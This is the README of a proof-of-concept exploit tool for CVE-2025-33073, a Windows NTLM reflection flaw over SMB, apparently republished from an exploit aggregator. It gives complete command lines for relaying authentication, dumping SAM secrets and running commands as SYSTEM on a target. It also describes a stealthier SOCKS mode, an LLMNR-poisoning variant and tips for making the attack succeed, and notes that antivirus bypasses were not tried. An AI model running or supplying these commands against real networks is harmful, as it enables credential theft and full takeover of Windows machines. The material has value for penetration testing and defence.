Exploit for CVE-2025-33073

## https://sploitus.com/exploit?id=033EBB26-C32E-5434-8C61-CD4BA9F9668D
# CVE-2025-33073
PoC Exploit for the NTLM reflection SMB flaw.

All credits go to the offical research:</br>
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

### Prerequisites
OS: Kali Linux (has most packages pre-installed).

* NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
* impacket-ntlmrelayx
* dnstool.py (included in repo)
* xterm (only for GUI)

### Example usage
**GUI**
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
```
![image](https://github.com/user-attachments/assets/83ce744a-161e-4c0f-9f2d-6d57f23a913c)

**CLI**
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
```
![image](https://github.com/user-attachments/assets/fff4fcde-0a93-43c9-b93e-990554ccb689)

**Custom command**</br>
Instead of running secretsdump a custom command can be executed.
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
```
![image](https://github.com/user-attachments/assets/1a054df7-ba08-4c9c-a4cf-737eb0827534)

**SOCKS**</br>
For more stealthy execution of commands after valid connection as SYSTEM has been made. --target and --target-ip should be equal here.
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
```
![image](https://github.com/user-attachments/assets/8cf77803-f417-4abe-a993-746049b2634c)
Also a custom command can be ran through proxychains instead of dumping SAM.
```
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
```
![image](https://github.com/user-attachments/assets/6ecf0e32-ccd2-4a61-a024-644b214607ea)

### Manual exploit without DNS requirement
If you're in the same broadcast domain as the device and it's vulnerable for LLMNR poisioning it's possible to exploit a device without having to register a DNS record.

![image](https://github.com/user-attachments/assets/20c81ea0-88bf-4334-98aa-d2cb93f473b1)


### Troubleshooting

* I've seen the attack not work sometimes because the hostname is used for the attack which results in a DNS lookup from Kali. If Kali is not using the DNS server or you get a '/ FAILED' message from impacket-ntlmrelayx try adding the host to your /etc/hosts file. This should result in the attack working.
* If using IP the attack should work. Sometimes running it multiple times will result in a SUCCESS instead of failure. It's until now not perfectly clear why this happens. I think it has something to do with networking.
* Try another coerce method using -M or --method.

#### Wireshark

**Local NTLM authentication takes place**
![image](https://github.com/user-attachments/assets/0a3fe643-2d52-427a-91f2-991770732f62)

**Local NTLM authentication does not take place resulting in a FAILED attempt**
![image](https://github.com/user-attachments/assets/7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348)

#### Good to know
* xterm allows copying and pasting with the middle mouse button.
* DNS-record should also be known to the client, this can take more time in some occasions. With more time I mean give it a couple of minutes.
* This is just a PoC which means AV/EDR bypasses have not been tried to bypass. Use at own risk.
</br>

### How to fix
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073